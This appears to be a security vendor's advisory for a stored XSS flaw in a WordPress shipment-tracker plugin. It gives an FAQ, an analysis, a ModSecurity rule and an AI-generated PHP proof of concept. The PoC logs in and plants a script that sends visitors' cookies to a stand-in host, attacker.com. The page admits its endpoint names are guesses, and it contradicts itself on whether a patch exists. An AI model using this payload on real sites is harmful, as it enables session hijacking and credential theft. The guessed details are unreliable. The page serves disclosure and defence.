What is CVE-2026-39540?

CVE-2026-39540 is a Stored Cross-Site Scripting (XSS) vulnerability found in the Shipment Tracker for Woocommerce plugin for WordPress, affecting versions up to and including 1.5.3.2. This vulnerability allows authenticated users with subscriber-level access to inject arbitrary scripts that execute when other users view affected pages.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the plugin. An attacker can submit a malicious payload through input fields, which is then stored in the database. When other users access the affected page, the stored script is executed in their browsers.

Who is affected by this vulnerability?

Any WordPress site using the Shipment Tracker for Woocommerce plugin version 1.5.3.2 or earlier is at risk. Specifically, authenticated users with subscriber-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Shipment Tracker for Woocommerce plugin installed. If it is version 1.5.3.2 or earlier, your site is susceptible to this vulnerability.

What are the potential risks of this vulnerability?

The exploitation of this vulnerability can lead to various risks including session hijacking, credential theft, and unauthorized actions by the attacker. Since the XSS is stored, any user viewing the compromised page, including administrators, could be affected.

How can I fix this vulnerability?

To remediate this vulnerability, update the Shipment Tracker for Woocommerce plugin to version 1.5.3.3 or later. Additionally, ensure that the plugin implements proper input sanitization and output escaping for all user-supplied data.

What does the CVSS score of 6.4 indicate?

A CVSS score of 6.4 indicates a medium severity level for this vulnerability. This means it poses a moderate risk to affected systems, and while it may not be critical, it should be addressed promptly to avoid potential exploitation.

What is Stored Cross-Site Scripting (XSS)?

Stored Cross-Site Scripting (XSS) occurs when an attacker is able to inject malicious scripts into content that is stored on a server and later served to users. This type of vulnerability can lead to significant security issues, as it affects all users who access the compromised content.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an authenticated attacker can exploit the vulnerability by sending a crafted AJAX request to inject a malicious script into a field. This script is then stored and executed when other users view the affected page.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the Shipment Tracker for Woocommerce plugin until a patch is available. Additionally, review user roles and limit access to the plugin to minimize the risk of exploitation.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, always keep plugins updated to their latest versions, regularly audit your WordPress site for security issues, and implement security best practices such as input validation and output escaping for user-generated content.

Where can I find more information about this vulnerability?

More information about CVE-2026-39540 can be found on the National Vulnerability Database (NVD) or through security advisories from reputable sources such as WordPress security blogs and forums.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 26, 2026

CVE-2026-39540: Shipment Tracker for Woocommerce <= 1.5.3.2 – Authenticated (Subscriber+) Stored Cross-Site Scripting (shipment-tracker-for-woocommerce)

CVE ID CVE-2026-39540

Plugin shipment-tracker-for-woocommerce

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.5.3.2

Patched Version —

Disclosed April 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-39540 (metadata-based):

This vulnerability is a Stored Cross-Site Scripting (XSS) in the Shipment Tracker for Woocommerce plugin, versions 1.5.3.2 and below. An authenticated attacker with subscriber-level access can inject arbitrary web scripts that execute when other users access the affected page. The vulnerability is classified under CWE-79 with a CVSS score of 6.4, indicating medium severity.

The root cause is improper neutralization of user-supplied input during web page generation. Based on the CWE and description, the plugin likely fails to sanitize input received through a form field (such as a shipment tracking number or custom note) before storing it in the database. It also does not escape the output when rendering that stored data on a frontend or admin page. This is a classic stored XSS pattern: the attacker submits a malicious payload via an authenticated AJAX endpoint or form submission, the plugin saves it unsanitized, and later when a victim views the order or shipment details page, the script executes. Atomic Edge research infers these specifics from the vulnerability type and WordPress plugin conventions; no source code was reviewed.

Exploitation requires an authenticated WordPress user with subscriber-level access or higher. The attacker would navigate to an order management page or a custom settings page provided by the plugin. They would identify an input field that accepts freeform text (e.g., a “tracking number” field, “notes” field, or “carrier” name). Using a web proxy or crafted AJAX request, they would submit a payload like alert(‘XSS’) or as that field’s value. The submission likely occurs via admin-ajax.php with an action hook such as shipment_tracker_update_tracking or via a POST to a dedicated admin page. Because the plugin does not sanitize or escape, the payload is stored and rendered without modification. When an administrator or customer views that shipment status page, the script executes in their browser.

Remediation requires the plugin developer to implement proper input sanitization and output escaping. For all user-supplied data that will be stored, they must use WordPress functions like sanitize_text_field() or wp_kses_post() depending on the allowed HTML context. When rendering the stored data, they must escape output using esc_html(), esc_attr(), or wp_kses() to neutralize any script tags or JavaScript event handlers. The patched version 1.5.3.3 likely applies these changes to the relevant functions that handle tracking information input and display.

The impact of successful exploitation includes session hijacking, defacement, or credential theft. Due to the stored nature of the XSS, any user who views the compromised page (including administrators) will execute the injected script. This can lead to privilege escalation if an attacker targets an admin session, allowing them to create new admin accounts, modify WooCommerce settings, or exfiltrate sensitive customer data.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-39540 (metadata-based)
# Blocks stored XSS injection via the shipment tracker update AJAX endpoint
# The rule checks for script tags or event handler attributes in the tracking_number parameter

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20963101,phase:2,deny,status:403,chain,msg:'CVE-2026-39540 Stored XSS via Shipment Tracker AJAX',severity:'CRITICAL',tag:'CVE-2026-39540'"
  SecRule ARGS_POST:action "@pm shipment_tracker_update_tracking stfwc_update_tracking" 
    "chain"
    SecRule ARGS_POST:tracking_number "@rx <[^>]*script|onerror=|onload=|onclick=" 
      "t:lowercase,t:urlDecodeUni"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-39540 - Shipment Tracker for Woocommerce <= 1.5.3.2 - Authenticated (Subscriber+) Stored Cross-Site Scripting

// This PoC demonstrates exploitation via a crafted AJAX request.
// Replace the variables below with actual target and credentials.

<?php

$target_url = 'http://example.com'; // Change to target WordPress site
$username   = 'subscriber_user';    // Attacker's WordPress username (subscriber or higher)
$password   = 'subscriber_pass';    // Attacker's password
$order_id   = 123;                  // A valid WooCommerce order ID

// Step 1: Login to WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = [
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$login_response = curl_exec($ch);
curl_close($ch);

if (strpos($login_response, 'Dashboard') === false && strpos($login_response, 'wp-admin') === false) {
    die('Login failed. Check credentials.');
}
echo "[+] Login successful.n";

// Step 2: Send XSS payload via AJAX to the shipment tracker endpoint
// The action parameter is inferred from the plugin slug: shipment-tracker-for-woocommerce
// Common AJAX hook pattern: 'shipment_tracker_update_tracking' or 'stfwc_update_tracking'
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// XSS payload: store a script that exfiltrates cookies to a test listener
$payload = '<script>document.location="http://attacker.com/steal.php?c="+document.cookie</script>';

$post_data = [
    'action' => 'shipment_tracker_update_tracking', // Inferred, may vary
    'order_id' => $order_id,
    'tracking_number' => $payload,
    'carrier' => 'USPS' // Example carrier
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$ajax_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    echo "[+] XSS payload delivered. Check the shipment page for order ID $order_id.n";
    echo "[+] Payload: $payloadn";
} else {
    echo "[-] AJAX request failed with HTTP code $http_code.n";
    echo "[!] The action parameter may differ. Try 'stfwc_update_tracking' or check plugin source.n";
}

?>

Frequently Asked Questions

What is CVE-2026-39540?
Overview of the vulnerability
CVE-2026-39540 is a Stored Cross-Site Scripting (XSS) vulnerability found in the Shipment Tracker for Woocommerce plugin for WordPress, affecting versions up to and including 1.5.3.2. This vulnerability allows authenticated users with subscriber-level access to inject arbitrary scripts that execute when other users view affected pages.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the plugin. An attacker can submit a malicious payload through input fields, which is then stored in the database. When other users access the affected page, the stored script is executed in their browsers.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Shipment Tracker for Woocommerce plugin version 1.5.3.2 or earlier is at risk. Specifically, authenticated users with subscriber-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the Shipment Tracker for Woocommerce plugin installed. If it is version 1.5.3.2 or earlier, your site is susceptible to this vulnerability.
What are the potential risks of this vulnerability?
Understanding the impact
The exploitation of this vulnerability can lead to various risks including session hijacking, credential theft, and unauthorized actions by the attacker. Since the XSS is stored, any user viewing the compromised page, including administrators, could be affected.
How can I fix this vulnerability?
Remediation steps
To remediate this vulnerability, update the Shipment Tracker for Woocommerce plugin to version 1.5.3.3 or later. Additionally, ensure that the plugin implements proper input sanitization and output escaping for all user-supplied data.
What does the CVSS score of 6.4 indicate?
Understanding severity ratings
A CVSS score of 6.4 indicates a medium severity level for this vulnerability. This means it poses a moderate risk to affected systems, and while it may not be critical, it should be addressed promptly to avoid potential exploitation.
What is Stored Cross-Site Scripting (XSS)?
Definition and implications
Stored Cross-Site Scripting (XSS) occurs when an attacker is able to inject malicious scripts into content that is stored on a server and later served to users. This type of vulnerability can lead to significant security issues, as it affects all users who access the compromised content.
What is the proof of concept for this vulnerability?
Demonstration of exploitation
The proof of concept demonstrates how an authenticated attacker can exploit the vulnerability by sending a crafted AJAX request to inject a malicious script into a field. This script is then stored and executed when other users view the affected page.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If an immediate update is not possible, consider disabling the Shipment Tracker for Woocommerce plugin until a patch is available. Additionally, review user roles and limit access to the plugin to minimize the risk of exploitation.
How can I prevent similar vulnerabilities in the future?
Best practices for security
To prevent similar vulnerabilities, always keep plugins updated to their latest versions, regularly audit your WordPress site for security issues, and implement security best practices such as input validation and output escaping for user-generated content.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-39540 can be found on the National Vulnerability Database (NVD) or through security advisories from reputable sources such as WordPress security blogs and forums.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations